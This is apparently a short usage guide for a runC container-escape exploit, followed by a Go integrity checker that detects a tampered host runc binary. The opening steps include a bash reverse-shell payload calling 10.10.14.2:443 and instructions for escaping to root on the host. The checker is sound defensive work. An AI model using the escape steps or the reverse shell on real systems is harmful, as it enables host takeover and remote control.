5 privesc docker runC exploit
Using
The vulnerability allows a malicious container to overwrite the host runc binary and thereby gain root-level code execution on the host. The level of user interaction required is the ability to run any command.
Update the payload in main.go:
var payload = "#!/bin/bash \n bash -i >& /dev/tcp/10.10.14.2/443 0>&1"
Compile it with go build main.go.
Move that binary to the container you'd like to escape from.
Execute the binary; the next time someone attaches to the container and calls /bin/sh, your payload will fire.
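Because the escape works by overwriting the host runc binary, a host-side integrity check will show it. The following is an added example, not code from the original page or from the runc project: it compares the runc file against a SHA-256 baseline and flags content that is no longer an ELF executable, such as a file starting with "#!" like the payload above. The runc path and the baseline digest are assumptions supplied by the operator from a trusted package.

```go
package main

import (
	"bytes"
	"crypto/sha256"
	"encoding/hex"
	"fmt"
	"os"
	"strings"
)

// Finding summarises what the inspected runc file looks like on disk.
type Finding struct {
	SHA256    string // hex digest of the file content
	IsELF     bool   // starts with the ELF magic, as a compiled runc does
	IsScript  bool   // starts with "#!", like the script payload on this page
	HashMatch bool   // digest equals the operator-supplied baseline (assumption)
}

// InspectRunc classifies runc file content against a known-good SHA-256 digest.
func InspectRunc(content []byte, baselineSHA256 string) Finding {
	sum := sha256.Sum256(content)
	digest := hex.EncodeToString(sum[:])
	return Finding{
		SHA256:    digest,
		IsELF:     bytes.HasPrefix(content, []byte("\x7fELF")),
		IsScript:  bytes.HasPrefix(content, []byte("#!")),
		HashMatch: strings.EqualFold(digest, strings.TrimSpace(baselineSHA256)),
	}
}

// Tampered is true when the file is not an ELF binary or differs from the baseline.
func (f Finding) Tampered() bool { return !f.IsELF || !f.HashMatch }

func main() {
	if len(os.Args) != 3 {
		fmt.Fprintln(os.Stderr, "usage: runccheck <path-to-runc> <baseline-sha256>")
		os.Exit(2)
	}
	content, err := os.ReadFile(os.Args[1])
	if err != nil {
		fmt.Fprintln(os.Stderr, "read error:", err)
		os.Exit(2)
	}
	f := InspectRunc(content, os.Args[2])
	fmt.Printf("sha256=%s elf=%t script=%t tampered=%t\n", f.SHA256, f.IsELF, f.IsScript, f.Tampered())
	if f.Tampered() {
		os.Exit(1) // non-zero exit so a scheduler or monitoring agent can alert
	}
}
```

Run it on the host itself, not inside a container, and record the baseline digest before any untrusted container is started.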